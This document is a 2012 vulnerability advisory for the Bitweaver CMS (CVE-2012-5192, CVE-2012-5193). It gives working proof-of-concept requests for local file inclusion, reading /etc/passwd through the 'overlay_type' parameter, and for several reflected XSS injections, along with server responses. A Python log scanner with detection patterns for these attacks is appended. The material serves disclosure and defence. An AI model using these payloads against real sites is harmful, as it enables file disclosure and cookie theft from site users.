Bitweaver Multiple Cross-Site Scripting and Local File Inclusion Vulnerabilities

Published: 2012-10-23
Updated: 2012-10-28

Affected systems:
Bitweaver Bitweaver 3.x

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56230
CVE ID: CVE-2012-5192, CVE-2012-5193

Bitweaver is a free, open-source web application framework and content management system. Bitweaver 3.1 and other versions contain multiple security vulnerabilities. An attacker can exploit them to execute arbitrary script code in the browser of a user of an affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the web server process.

1) Input passed via the "username" POST parameter to users/remind_password.php, the "days" POST parameter to stats/index.php, and the "login" POST parameter to users/register.php is returned to the user without being properly filtered. This can be exploited to execute arbitrary HTML and script code in a user's browser in the context of the affected site.

2) Input passed via the "textarea_id" parameter to quicktags/special_chars.php and the "email" POST parameter to users/register.php is returned to the user without being properly filtered. This can be exploited to execute arbitrary HTML and script code in a user's browser in the context of the affected site.

<*Source: David Aaron
  *>

Test method:
--------------------------------------------------------------------------------
Warning: The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Users assume all risk!

Finding 1: Local File Inclusion Vulnerability
CVE: CVE-2012-5192

The "overlay_type" parameter in the "gmap/view_overlay.php" page in Bitweaver is vulnerable to a local file inclusion vulnerability. This vulnerability can be demonstrated by traversing to a known readable path on the web server file system.

Example: Performing LFI on the "overlay_type" parameter

#Request
http://www.example.com/bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00

#Response
root:x:0:0:root:/root:/bin/bash
<snip>

Finding 2: Multiple XSS Vulnerabilities in Bitweaver
CVE: CVE-2012-5193

Multiple cross-site scripting (XSS) vulnerabilities have been discovered that allow remote unauthenticated users to run arbitrary scripts on the system.

Example: The following Proof of Concepts illustrate that Bitweaver 2.8.1 is vulnerable to XSS.

Example(s):

1. Performing XSS on stats/index.php

#Request
GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert("XSS")%3B%3C%2Fscript%3E HTTP/1.0

#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:34 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

2. Performing XSS on /newsletters/edition.php

#Request
GET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert("XSS")%3B%3C%2Fscript%3E HTTP/1.0

#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:02 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

3. Performing XSS on the "username" parameter available on /users/

#Request
POST /bitweaver/users/remind_password.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

username=%22%3E%3Cscript%3Ealert("XSS")%3B%3C%2Fscript%3E&remind=Reset+%28password%29

#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:53:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 15974
[truncated due to length]<snip>
Invalid or unknown username: ">alert("XSS");</p></div>Please follow the instructions in the email.
<snip>

4. Performing XSS on the "days" parameter on /stats/index.php

#Request
POST /bitweaver/stats/index.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

days=%22%3E%3Cscript%3Ealert("XSS")%3B%3C%2Fscript%3E&pv_chart=Display

#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:55:53 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24778
[truncated due to length]<snip>
<img src="/stats/pv_chart.php?days="><script>alert("XSS");</script>" alt="Site Usage Statistics" />
<snip>

5. Performing XSS on the "login" parameter on /users/register.php (try entering "><IFRAME src="https://www.trustwave.com" height="1000px" width="1000px"> into the "Username" field):
http://www.example.com/bitweaver/users/register.php

6. Performing XSS on the "highlight" parameter:

#Request
GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert("XSS")%253B%253C%252Fscript%253E HTTP/1.0

#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:59:09 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ama93jqlojmi385plkft5opl64; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Bitweaver
---------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
http://www.bitweaver.org/
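As an added defensive example (not part of the original advisory or of Bitweaver), the Python below scans web-server access-log lines for the request patterns this advisory documents: traversal sequences and a trailing null byte such as those sent to "overlay_type", and tag breakout or script injection in the query string or path info. It percent-decodes repeatedly so the double-encoded "highlight" payload is caught as well. The log lines, IP addresses and sizes are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines modelled on the advisory's requests (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [17/Apr/2012:15:42:34 +0000] "GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E HTTP/1.0" 200 15974
203.0.113.5 - - [17/Apr/2012:15:44:10 +0000] "GET /bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00 HTTP/1.0" 200 2048
203.0.113.5 - - [17/Apr/2012:15:59:09 +0000] "GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert(%22XSS%22)%253B%253C%252Fscript%253E HTTP/1.0" 200 24778
198.51.100.7 - - [17/Apr/2012:16:01:00 +0000] "GET /bitweaver/gmap/view_overlay.php?overlay_type=marker HTTP/1.0" 200 1200
"""

# Detection rules applied to the fully decoded request target.
RULES = {
    "path_traversal": re.compile(r"(\.\./|\.\.\\)"),   # ../ sequences used for LFI
    "null_byte": re.compile(r"\x00"),                   # %00 used to cut off an appended suffix
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    "tag_breakout": re.compile(r'">\s*<'),              # closes an attribute and opens a new tag
}

# Common log format: ip ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)


def fully_decode(uri: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %2522 -> %22 -> " is caught."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def scan_log(text: str) -> list:
    """Return one finding per log line whose decoded target matches any rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line
        target = fully_decode(m.group("uri"))
        hits = [name for name, rx in RULES.items() if rx.search(target)]
        if hits:
            findings.append({"ip": m.group("ip"), "uri": m.group("uri"), "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], ",".join(f["rules"]), f["uri"])
```

The benign fourth line produces no finding; each of the first three is flagged with the rule names that matched.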